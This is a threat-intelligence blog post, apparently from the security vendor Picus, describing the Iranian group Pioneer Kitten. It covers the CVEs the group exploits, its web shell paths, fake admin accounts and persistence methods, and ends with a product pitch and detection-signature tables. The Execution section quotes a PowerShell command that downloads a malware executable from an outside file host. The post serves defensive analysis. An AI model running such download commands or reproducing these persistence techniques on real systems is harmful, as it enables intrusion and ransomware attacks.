.svg)
.svg)
Pioneer Kitten: The Iranian State-sponsored Cyber Actors
Pioneer Kitten, an Iranian state-sponsored cyber group active since 2017, has rebranded itself as "xplfinder" in 2024, following its previous name "Br0k3r," which reflected their practice of selling access to compromised networks. The group has continued its activities into August 2024, targeting organizations primarily in the U.S. and Middle Eastern countries like Israel, Azerbaijan, and the United Arab Emirates. Their primary goal is to gain and sustain unauthorized access to victim networks, which they then exploit for a range of malicious purposes.
Pioneer Kitten leverages this access to collaborate with ransomware affiliates, including NoEscape, Ransomhouse, and ALPHV (aka BlackCat), playing a crucial role in facilitating encryption operations and extorting victims. However, the group's involvement goes beyond only providing access; they actively participate in locking down networks and devising strategies to maximize extortion efforts.
Tactics, Techniques, and Procedures (TTPs) used by Pioneer Kitten
The following is an overview of the TTPs observed in Pioneer Kitten's attack campaigns, showcasing their systematic approach to compromising and exploiting victim networks.
Reconnaissance
T1596 - Search Open Technical Databases
Pioneer Kitten uses the Shodan[.]io search engine to identify IP addresses hosting network devices with known vulnerabilities (CVE refers to specific security flaws). By scanning for these weaknesses, the group can locate and target publicly accessible devices that provide easy entry points into the network—essentially targeting "low-hanging fruits" that are easier to exploit.
Initial Access
T1190 - Exploit Public-Facing Application
Pioneer Kitten capitalizes on these identified vulnerabilities in public-facing networking devices to establish initial access to target networks.
Notable vulnerabilities exploited by the group include:
- Citrix Netscaler: CVE-2019-19781, CVE-2023-3519
- F5 BIG-IP: CVE-2022-1388
- Pulse Secure/Ivanti VPNs: CVE-2024-21887
- PanOS firewalls: CVE-2024-3400
- Check Point Security Gateways: CVE-2024-24919
Persistence
T1505.003 - Web Shell
After exploiting vulnerable devices, Pioneer Kitten deploys web shells to maintain persistence and capture login credentials. Specific techniques include:
-
Capturing login credentials on compromised Netscaler devices and appending them to a file named netscaler.1 located in the same directory as the web shell.
-
Creating the directory /var/vpn/themes/imgs/ on Citrix Netscaler devices and deploying malicious files, such as:
- netscaler.1
- netscaler.php
- ctxHeaderLogon.php
-
Deploying additional web shells on compromised Netscaler devices right after system owners patch the exploited vulnerabilities. By placing new web shells, attackers create a contingency plan. Even if the original vulnerability is fixed, they have pre-established alternative entry points, reducing the likelihood that they will be completely locked out of the system.
The additional web shells were observed as with the following file paths.
-
- /netscaler/logon/LogonPoint/uiareas/ui_style.php
- /netscaler/logon/sanpdebug.php
T1136.001 - Create Account (Local Account)
The group creates local accounts on victim networks to maintain access. Observed account names include:
- "sqladmin$"
- "adfsservice"
- "IIS_Admin"
- "iis-admin"
- "John McCain"
By creating accounts that mimic legitimate system accounts (e.g., "IIS_Admin," "sqladmin$"), attackers ensure they have ongoing access to the system even if their initial entry method is detected and blocked. These accounts are used for lateral movement within the network, execution of commands, and further exploitation while blending in with regular user activity.
T1098 - Account Manipulation
The attackers ask for exceptions to zero-trust and security policies, allowing them to install and run their malicious tools without being blocked or detected within the victim's network.
T1053 - Scheduled Task/Job
Pioneer Kitten uses scheduled tasks to maintain persistence by loading malware through installed backdoors.
For example:
-
A scheduled task named SpaceAgentTaskMgrSHR in the Windows/Spaceport/ task folder uses a DLL side-loading technique to load a payload from version.dll.
-
They also place a malicious backdoor file, version.dll, in the C:\Windows\ADFS\ directory.
T1505 - Server Software Component
Pioneer Kitten also creates a daily Windows service task that is designed to run automatically each day. They give these tasks random eight-character names to make them less suspicious and harder to detect.
The purpose of these tasks is to execute a DLL file with a matching name in the C:\Windows\system32\drivers\directory. For example, if the service is named "test," it will try to load and run a file named test.sys in that directory. This technique helps the attackers maintain persistence and evade detection, as the service and DLL file blend in with legitimate system files.
Privilege Escalation
T1078.003 - Valid Accounts: Local Accounts
Pioneer Kitten repurposes compromised credentials obtained from exploited networking devices (e.g., Citrix Netscaler) to log into other applications such as Citrix XenDesktop.
This means that the group uses login credentials they have stolen from compromised networking devices, like Citrix Netscaler, to access other systems and applications within the same network. For instance, once they have the credentials, they can log into Citrix XenDesktop, which is a virtual desktop infrastructure (VDI) platform. By doing so, they can move laterally across the network, accessing different parts of the system to further their attack.
T1078.002 - Valid Accounts: Domain Accounts
The attackers reuse stolen admin credentials from network administrators to gain access to domain controllers and other key systems within the victim's network. This level of access is highly dangerous, as it allows them to control vital network functions, escalate privileges, spread malware, and exfiltrate sensitive data, putting the entire network at serious risk.
Defense Evasion
T1562.001 - Impair Defenses: Disable or Modify Tools
The group uses administrator credentials to disable antivirus and security software to neutralize the defenses that could detect, block, or remove their malicious tools (a.k.a hunter-killer malware) and activities. By disabling these security controls, they ensure that their malware can run uninterrupted, maintaining their foothold on the compromised systems without being detected or hindered by protective measures
Credential Access
T1056 - Input Capture
Pioneer Kitten captures login credentials using web shells and other malicious tools deployed on compromised devices.
Execution
T1059.001 - Command and Scripting Interpreter
Pioneer Kitten leverages stolen administrator accounts to start remote desktop sessions and run commands on the compromised system. They often use tools like Microsoft Windows PowerShell to do this:
|
Invoke-WebRequest -Uri http://files.catbox.moe/ -OutFile C:\Users\Public\malware.exe |
The explanation of this PowerShell command is as follows:
-
Invoke-WebRequest: Makes an HTTP/S request to a specified URL.
-
-Uri http://files.catbox.moe/: The command is reaching out to a site called "catbox.moe" to download a file.
-
-OutFile C:\Users\Public\malware.exe: The file is saved in the C:\Users\Public\ directory with the name "malware.exe" (not the real name of the malware).
They also enable servers to use Windows PowerShell Web Access to execute their commands remotely.
Discovery
T1012 - Query Registry
Pioneer Kitten export registry hives and network firewall configurations to gather detailed information about system settings, security policies, and network architecture.
T1482 - Domain Trust Discovery
Additionally, the group performs domain trust discovery by exfiltrating account usernames from the domain controller and accessing configuration files and logs. This allows them to map out domain relationships and identify critical assets, which they can leverage for further exploitation and lateral movement within the network.
Command and Control
T1219 - Remote Access Software
Pioneer Kitten installs remote access software like AnyDesk and Meshcentral on compromised systems to maintain control.
From an attacker's perspective, installing remote access software on compromised systems ensures that they can maintain a consistent and reliable foothold in the network. These tools allow the attacker to remotely access and control the system at any time, bypassing the need to re-exploit vulnerabilities or re-establish access if their initial entry point is detected and removed. By using widely recognized remote access tools, attackers also blend in with legitimate administrative activities, making their presence harder to detect
T1572 - Protocol Tunneling
Pioneer Kitten leverages tools like Ligolo and NGROK to establish encrypted tunnels that facilitate stealthy communication with their command and control servers.
-
Ligolo sets up a reverse tunnel from the compromised system back to the attacker's machine. It encapsulates network traffic within an encrypted tunnel, allowing the attacker to access internal network resources remotely. By routing traffic through this tunnel, the attacker can operate as if they were on the local network, evading detection by security measures that focus on direct outbound connections.
-
NGROK creates a secure tunnel by linking the compromised system to a publicly accessible subdomain. This tunnel forwards traffic from NGROK's external server to the local system, disguising it as legitimate HTTPS traffic. This method helps the attacker bypass firewalls and intrusion detection systems, which may overlook such traffic as routine.
Exfiltration and Impact
T1657 - Exfiltration Over Web Service
After infiltrating victim networks, Pioneer Kitten collaborates with ransomware affiliates, including NoEscape, RansomHouse, and ALPHV (aka BlackCat). They provide these affiliates with access to the compromised networks in exchange for a share of the ransom payments. The actors also engage in data theft, likely supporting the goals of the Iranian government or other financially motivated objectives.
How Picus Helps Simulate Pioneer Kitten Attacks?
We also strongly suggest simulating Pioneer Kitten attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as APT40, Lazarus, and Volt Typhoon, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Pioneer Kitten aka Fox Kitten and its affiliates:
|
Threat ID |
Threat Name |
Attack Module |
|
99935 |
Fox Kitten Campaign Malware Email Threat |
E-mail Infiltration |
|
57995 |
Fox Kitten Campaign Malware Download Threat |
Network Infiltration |
|
64903 |
NoEscape Ransomware Download Threat |
Network Infiltration |
|
28790 |
NoEscape Ransomware Email Threat
|
E-mail Infiltration |
|
75742 |
BlackCat Ransomware Campaign 2022 |
Windows Endpoint |
|
93524 |
BlackCat Ransomware Campaign 2022 |
Linux Endpoint |
|
92332 |
BlackCat Ransomware Email Threat
|
E-mail Infiltration |
|
54213 |
BlackCat Ransomware Download Threat
|
Network Infiltration |
|
75365 |
The RansomHouse Threat Group Campaign Malware Download |
Network Infiltration |
|
41775 |
The RansomHouse Threat Group Campaign Malware Email Threat |
E-mail Infiltration |
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address malware and vulnerabilities exploited by the Pioneer Kitten group in preventive security controls. Currently, Picus Labs validated the following signatures for Pioneer Kitten Group:
|
Security Control |
Signature ID |
Signature Name |
|
CheckPoint |
0E10524C1 |
Trojan.Win32.Generic.TC.b77eSYFZ |
|
CheckPoint |
0A316073D |
Ransomware.Win32.NoEscape.TC.23f6HLVp |
|
CheckPoint |
0CC97E9AB |
Trojan-Ransom.Win32.Cryptor.TC.4e5eBKGN |
|
Forcepoint |
|
File_Malware-Blocked |
|
Fortinet AV |
6176954 |
MSIL/Tiny.BQ!tr.dldr |
|
Fortinet AV |
8182900 |
Riskware/SSHNet |
|
Fortinet AV |
62183 |
PossibleThreat |
|
Fortinet AV |
10140397 |
W32/Filecoder_Avaddon.H!tr.ransom |
|
Fortinet AV |
10147974 |
W32/Avaddon.H!tr.ransom |
|
Fortinet AV |
10153973 |
Linux/Filecoder_NoEscape.B!tr |
|
Fortinet AV |
10137650 |
ELF/Babuk.D597!tr.ransom |
|
Fortinet AV |
10054921 |
Linux/Filecoder_Babyk.A!tr |
|
Trellix |
0x4840c900 |
MALWARE: Malicious File Detected by GTI |
|
Palo Alto |
179774634 |
Trojan-Veil/Win32.flrh.a |
|
Palo Alto |
333471849 |
trojan/Win32 EXE.htool.ar |
|
Palo Alto |
612809409 |
trojan/Linux.noescape.h |
|
Palo Alto |
605194932 |
Ransom/Win32.noescape.e |
|
Palo Alto |
587399268 |
Trojan/Win32.cryptinject.hqu |
|
Palo Alto |
619620462 |
Ransom/Linux.noescape.m |
|
Palo Alto |
584113416 |
Ransom/Linux.esxiargs.a |
|
Palo Alto |
607701795 |
Trojan-Ransom/Linux.babuk.cy |
|
Palo Alto |
627436494 |
Ransom/Linux.mario.i |
|
Palo Alto |
628705521 |
Ransom/Linux.babuk.ep |
|
Cisco FirePower |
W32.D42F454627-100.SBX.VIOC |
|
|
Cisco FirePower |
Win.Noescape.tii.Talos |
|
|
Cisco FirePower |
W32.Auto:2c1a4f.in03.Talos |
|
|
Cisco FirePower |
W32.Auto:d36afc.in03.Talos |
|
|
Cisco FirePower |
W32.Auto:3934b3.in03.Talos |
|
|
Cisco FirePower |
W32.Auto:afe398.in03.Talos |
|
|
Cisco FirePower |
Auto.0A77E5.262364.in02 |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] "Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
[2] F. Fkie, "Fox Kitten (Threat Actor)." Available: https://malpedia.caad.fkie.fraunhofer.de/actor/fox_kitten. [Accessed: Aug. 28, 2024]
